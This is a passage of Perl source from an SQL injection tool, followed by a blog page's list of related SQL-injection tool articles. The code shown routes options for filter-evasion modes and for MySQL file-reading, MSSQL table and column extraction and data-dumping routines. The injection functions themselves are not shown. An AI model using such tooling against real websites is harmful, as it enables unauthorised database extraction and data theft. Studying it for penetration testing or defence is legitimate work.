         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);     
     }
}

if (defined($mysql_load_file))
{
     if(!defined($word_list))
     {
         print "[!] Please Define A list of tables to load\n";
         exit();
     }     
     else
     {
         print "[+] MySQL Load_File Fuzzer\n\n" ;
         print "[+] Target : $mysql_load_file\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mysqlfile($mysql_load_file,$evasion,$word_list);     
     }
}

if (defined($mssql_details_target))
{
     print "[+] MsSQL DB Details\n\n" ;
     print "[+] Target : $mssql_details_target\n" ;
     if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
         $evasion = "--"
     }
     mssqldetails($mssql_details_target,$evasion);     
}

if (defined($mssql_table_target))
{
     print "[+] MsSQL Tables Extractor\n\n" ;
     print "[+] Target : $mssql_table_target\n" ;
     if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
         $evasion = "--"
     }
     mssqltable($mssql_table_target,$evasion);     
}

if (defined($mssql_column_target))
{
     if(!defined($sql_dump_table))
     {
         print "[!] Please Defind At Least A Table do Extract from\n";
         exit();
     }
     else
     {
         print "[+] MsSQL Columns Extractor\n\n" ;
         print "[+] Target : $mssql_column_target\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);     
     }
}

if (defined($mssql_dump_target))
{
     if(!defined($sql_dump_table))
     {
         print "[!] Please Defind At Least A Table\n";
         exit();
     }
     elsif(!defined($sql_dump_column))
     {
         print "[!] Please Defind At Least A Column\n";
         exit();
     }
     else
     {
         print "[+] MsSQL Data Dumper\n\n" ;
         print "[+] Target : $mssql_dump_target\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);     
     }
}


yunshouhu
关注
专栏目录
超级SQL注入工具V1.0正式版源码
03-31
C# vs2015开发 官方下载地址: http://www.shack2.org/article/1417357815.html 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 超级SQL注入工具支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 超级SQL注入工具支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具支持Bool型盲注、错误显示注入、Union注入等方式获取数据。 超级SQL注入工具支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
每日分享-sql注入简单检测小工具(仅供参考学习)
qq_53717877的博客
09-02 6546
python版本:3.9.6 代码如下: #!/usr/bin/python3 # -*- coding:UTF-8 -*- import requests url = 'http://localhost/sql/lab-1/index.php?id=1' #测试url try: sq=requests.get(url,timeout=3) #发出get请求,连接时间超过3秒时退出 test=sq.headers['Content-Length'] #输出所得到的Content-Length
2022 年不错的 SQL 注入 (SQLi) 检测工具
网络技术联盟站
02-07 4009
SQL 注入 (SQLi) 是一种可以访问敏感或私有数据的隐蔽攻击形式,它们最早是在上世纪末被发现的,尽管它们的年龄很大,但它们经常被用作黑客工具包中的一种有效技术。今天,给大家介绍一下顶级 SQLi 检测工具。 顶级 SQLi 检测工具 有很多 SQLi 检测工具,其中许多是开源的,可在 GitHub 上找到,除了专门的 SQLi 检测工具外,还有更大的套件和专有软件包将 SQLi 作为其整体漏洞检测功能的一部分。 Netsparker Netsparker是一个 Web 漏洞管理解决方案,其中包括 SQ
自己动手编写SQL注入漏洞扫描工具
12-19
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
SQL注入漏洞检测原型工具
11-06
一个SQL注入漏洞检测原型工具,由SQL注入动态检测工具SQL漏洞静态代码检测工具,测试用的网站3部分组成。用Java语言实现。运行时需eclipse等IDE支持。可供学习参考。
Puppy Care 宠物护理Unity儿童模拟游戏项目源码c#
最新发布
05-27
Puppy Care 宠物护理Unity儿童模拟游戏项目源码c# Unity2017.3.1f1或更高版本 项目描述 Puppy Care Unity 源代码专为幼儿和学龄前儿童设计,在 App Markets 上得分非常高!如果您仍然没有进入这个利基市场,这绝对...
datapuppylite数据库转换工具
11-04
这款工具特别支持MySQL、Oracle、PostgreSQL(pgsql)以及SQL Server之间的数据转换,使得用户能够在这些主流数据库之间灵活地迁移数据,适应不同的项目需求或环境变化。 **MySQL转PostgreSQL(pgsql)** MySQL是...
puppy 串口 网络端口调试工具
09-24
串口调试;网络开发调试;iPhone 调试;unix linux 远程调试; 常用的 串口调试 网络调试工具 串口调试;网络开发调试;iPhone 调试;unix linux 远程调试; 常用的 串口调试 网络调试工具
java6.0源码-puppy:puppy是使用Python的Web程序员的元框架
06-04
java6.0源码介绍 Puppy 是 Python Web 开发人员的(驱动程序)元框架。 您在部署网站时手动运行了缩小工具、图像优化器、css 生成器、JavaScript 单元测试工具和其他工具,不是吗? Puppy 会为您自动完成这一切。 它...
Puppy Custom Background-crx插件
03-19
点击“添加到chrome”,即表示我接受并同意安装Puppy自定义背景扩展程序,并将Chrome:trade_mark:新建标签设置为服务提供的扩展名以及隐私权(bex-digital.com/privacy-policy)和使用条款( bex-digital....
sqlscan sql注入扫描
08-01
sql注入扫描 sqlscan sql注入扫描 sqlscan sql注入扫描
【Python】实现URL-sql注入检测+源码分析
浪子燕青的博客
01-25 9108
上篇博客写到了对原始URL爬行页面提取有效URL这篇继续深入,当提取到URL后开始检测是否存在注入漏洞  SQL注入检测思路:                 爬行网址,提取带有参数的url  如 http://www.target.com/show.asp?id=666 这样的url地址                 然后通过5重验证 :
Burp Suite插件开发之SQL注入检测(已开源)
热门推荐
Criss@陈磊
11-16 1万+
作者:bsmali4 预估稿费:400RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言 前段时间和某师傅了解到。现在漏洞越来越难挖,但有些老司机总能挖到别人挖不到的漏洞。于是就问了下,大概是什么类型的漏洞,他说是盲注。好吧,的确是,尤其是延时注入,这类东西真的不好测试。好多次我在sqlmap下面都没有测
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 1019
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
Wker_SQLTool注入工具(附源码
qq_18390561的博客
10-30 1835
Wker_SQLTool注入工具 0X01 前言 由于很早之前我的Python就已经在3.7版本了,导致处在2.7版本的sqlmap无法使用(具体如何让其在3.0以上版本运行,我就没有去深究,每次要用都要打开kali很麻烦),所以我用的一直是穿山甲这款SQL注入工具,我用的是3.3版本,里面爆出的漏洞太多,首先是MSSQL的切换数据库查询就不可以查询到, hostname也无法查询,切换数据库的b...
sql注入检测工具sqm---ettack汉化版的bug
kaosini的专栏
03-28 4787
转载请注明来源:http://blog.csdn.net/kaosini/article/details/8731549 sqlmap下面有个可以快速编写sqlmap命令并且执行的UI小工具,sqm.pyw,但是我发现有个bug: 这三个输入框都被隐掉了一部分,你输入的内容少的话,会看不到的。这个肯定是布局的问题了,用文本工具打开这个pyw文件,居然可以清晰的看到程序的代码。搜索“指定
[SQL注入检查工具]编写代码(一) --读取网页信息类
芽芽民工广场
11-13 1650
这几天接了个私活,也用到的读取网页的信息,就构造了下面两个类,这个两个类也可以用于SQL注入检查工具这个项目里,所以放这里也刚刚好,注释的我都写了,可是用法我暂时不写了,以后用到就明白了1、构造了一个web地址类,2、构造了一个得到页面数据和图片的类/**////     /// 页面连接信息类    ///     public  class CWebUrlInfo    ...
编写简单的SQL注入扫描
weixin_48170459的博客
01-02 967
我们用python编写一款简单的SQL注入扫描器,实现对网站的批量扫描。 本文章采用的方法是正确注入,首先我们先定制一下我们的payload,以下作为参考,读者可以自行增加 定制header 获取原URL的内容 把URL的参数提取出来 定义函数,构造payloadURL,并请求(i为我们要构造成payload请求参数的原参数,k为payload列表中的一个payload) 将payloadURL的内容和原URL的内容做对比,如果内容相同,或payloadURL的内容长度大于原URL的内容长度(因为
-bash: ./nmon_x86_puppy_GNU_2.0.0: 没有那个文件或目录
05-17
这个错误提示可能是因为你要执行的文件路径不正确或者文件不存在。请先确认你所要执行的文件路径是否..../home/user/nmon_x86_puppy_GNU_2.0.0 ``` 请注意,路径中的 `/home/user/` 需要根据你的实际情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值